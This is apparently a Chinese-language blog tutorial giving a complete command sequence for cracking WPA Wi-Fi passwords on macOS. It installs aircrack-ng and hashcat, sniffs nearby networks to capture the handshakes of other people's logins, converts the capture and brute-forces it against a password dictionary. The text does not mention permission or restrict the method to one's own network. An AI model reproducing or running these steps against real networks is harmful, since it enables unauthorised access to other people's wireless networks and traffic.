1.安装xcode,macport
2.安装aircrack-ng
sudo port install aircrack-ng
3.安装Hashcat
cd hashcat//进入目录sudo make
sudo make install //安装hashcat
hashcat -V 如看到版本信息则安装成功
4.安装Hashcat-utils
cd hashcat-utils/src
make && mv *.bin ../bin
cd ../bin
sudo install cap2hccapx.bin /usr/local/bin/cap2hccapx
5.密码生成器:Crunch 使用
这里有个可以下载,我没用过,仅供参考密码字典
6.获取当前网卡
ifconfig 例:我的en0
6.获取周围的WIFI
sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s
7.开始抓包,收集监听周围无线网络的数据
sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport en0 sniff 6
当执行以上命令,开始监听以后,Wifi的图标会变成一个小眼睛,监听久一点(其实就是一个等待别人连接wifi的过程,等待时间越长成功率越高),然后使用ctrl+c停止监听,数据保存到/tmp/airportSniffxxxx.cap文件中
8. 查看.cap文件
sudo aircrack-ng xxxxx.cap
如果Encryption值为WPA(1 handshake) ,说明抓取成功, 否者跳到要重新抓取(在监听的过程中如果有用户登陆这个wifi,那么包就会被我们截获,如果用户一直没有登陆到这个wifi,我们就还要继续等待监听,尽量在手机或者手提电脑所用高峰期开启捕获,这样捕获握手(handshake)的几率比较高)
9.将.cap转换为.hccapx
cd到.cap存放目录 cap2hccapx xx.cap xx.hccapx
10.爆破
hashcat -m 2500 xx.hccapx pwd.txt(pwd.txt为爆破字典 --show可显示内容)
网友评论